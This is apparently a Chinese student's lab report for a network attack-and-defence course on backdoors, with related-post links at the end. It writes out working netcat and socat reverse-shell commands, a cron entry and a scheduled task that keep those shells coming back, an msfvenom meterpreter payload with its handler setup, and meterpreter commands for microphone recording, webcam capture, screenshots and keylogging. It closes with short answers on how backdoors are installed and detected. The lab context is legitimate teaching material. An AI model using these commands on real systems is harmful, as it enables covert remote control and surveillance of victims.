2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践
2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践
一、实验说明
任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)
任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)
任务三:使用MSF:meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
任务四:使用MSF:meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分))
实验准备
windows环境下下载老师提供的ncat和socat。
使用ipconfig(windows下)和ipconfig(kali下)查询主机与虚拟机的IP地址(因为我没有2台电脑)
知道了双方ip后,接下来就是使用ncat和socat这两个工具了,我们先用主机使用ncat.exe程序监听本机的5225端口:
接着在Kali环境下,使用
nc
指令反向连接Windows主机的5225端口:发现成功获得kali的shell
那么反过来呢,如何用kali获得主机的shell:
我们先在kali下使用nc指令监听5225端口
接着在主机下使用ncat.exe程序的-e选项项反向连接Kali主机的5225端口::
结果也成功了
我们如何使用nc传输数据呢?
windows下使用
ncat.exe -l 5225
监听5225端口linux下使用
ncat 192.168.6.1 5225
链接(主机ip)很简单的就成功了
体验 MSF Meterpreter 功能
同样的,我们首先现在主机使用
ncat.exe -l -p 5225
启动监听5225端口然后用
crontab -e
指令编辑一条定时任务,在最后一行添加13 * * * * /bin/netcat 192.168.6.1 5225 -e /bin/sh
,意思是在每个小时的第13分钟反向连接Windows主机的5225端口。可见13分后,主机获得了kali的shell
同样的,反过来呢,让主机定时被kali获得shell:
首先,我们在任务计划程序创建任务,填写任务名称,并新建一个触发器。
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5225 exec:cmd.exe,pty,stderr
我们使用
windows + L
键重新进入电脑,发现任务进程中已有我们创好的触发器:此时,在Kali环境下输入指令
socat - tcp:192.168.6.1:5225
,13分时我们可以发现kali已可成功获得了一个cmd shell:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=5225 -f exe > 25test.exe
生成后门程序通过
nc
指令将生成的后门程序传送到Windows主机上在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
msfconsole下依次输入:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.6.128
set LPORT 5225
show options
exploit
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容
使用
record_mic
指令可以截获一段音频:使用
webcam_snap
指令可以使用摄像头进行拍照:使用
screenshot
指令可以进行截屏:使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:实验中遇到的问题及思考
问题:如图,计算机积极拒绝链接,一开始以为是防火墙的问题或者是ssh未打开,上网查了好多方法都没有用
解决方案:我打错了..少了端口号,加上就好了
实验总结及体会
本次实验我们简单了解和学习了一些后门工具的使用和如何通过他们来获得受害主机各种各样的权限;此次实验虽然内容简单,但我们对后门的基本原理了解却十分清晰,而且这次实验趣味性很强。
二、基础问题回答
问:例举你能想到的一个后门进入到你系统中的可能方式?
网上下载软件时、收邮件时、使用来历不明的u盘或者光盘时
问:例举你知道的后门如何启动起来(win及linux)的方式?
修改注册表、设置为开机自启动、诱导用户点击或者光标划过、可以设为定时启动、启动绑定软件时启动
问:Meterpreter有哪些给你映像深刻的功能?
它获取权限之后简直可以完全执行受害主机的所有功能..
问:如何发现自己有系统有没有被安装后门?
可以检测网络连接,查看是否有IP与本机建立连接;安装专门的杀毒软件查看,看注册表有没有多出奇怪的东西;看任务运行列表是否有奇怪的任务
2018-2019-2 20165225『网络对抗技术』Exp2:后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 <网络对抗技术>Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0. ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
随机推荐
- STM32-cJSON库的打包和解析
这几天使用了一下JSON在STM32103平台上的使用,还是很好用的,在此记录下. JSON是啥我也不总结了,就是直观的看起来是一个有格式的字符串,看起来非常清楚明白,有点像Python中的dicit ...
- HTML5 图片下载
1. 概述 1.1 说明 在项目过程中,有时候需要下载某一展示图片,html5中定义了<a> download属性,download属性规定被下载的超链接目标,该属性可以设置一个值来规定下 ...
- 图文详解互联网根基之HTTP
这是本人对<图解HTTP>和<HTTP权威指南>阅读后总结的大家常用的.重要的知识点,前端.后端同学居家必备! 一.概述 HTTP是Hyper Text Transfer Pr ...
- liunx mysql 备份
执行命令:mysqldump -uroot -p lanwei > lanwei2018-08-02.sql 出错 -bash: mysqldump: command not found 查看m ...
- CentOS7.6 yum方式安装mysql2.7.25
在CentOS中默认安装有MariaDB,这个是MySQL的分支,但为了需要,还是要在系统中安装MySQL,而且安装完成之后可以直接覆盖掉MariaDB 1 下载并安装MySQL官方的 Yum Rep ...
- java学习 之 java基本数据类型
java 8个基本数据类型 public class BasicDataType { public static void main(String args[]) { //数据类型 //Byte Sy ...
- spring boot 添加拦截器的简单实例(springBoot 2.x版本,添加拦截器,静态资源不可访问解决方法)
spring中拦截器主要分两种,一个是HandlerInterceptor,一个是MethodInterceptor 一.HandlerInterceptor HandlerInterceptor是s ...
- Ubuntu 18.04LTS 更新镜像配置
清华大学开源镜像站:https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu/ Ubuntu 的软件源配置文件是 /etc/apt/sources.list.将 ...
- net core 获取配置文件
IConfiguration服务是net core 默认依懒注入的一个对象 直接注入(推荐使用) 新建控制器 然后构造函数直接注入 [Route("api/[controller]" ...
- asp+SqlServer2008开发【第四集:windows server 2008 r2的操作记录】
1,使用powershell server和putty像远程linux一样操作windows服务器,解决使用mstsc命令无法远程桌面的问题. 2,使用IMM管理,使用浏览器查看IBM服务器的工作状况 ...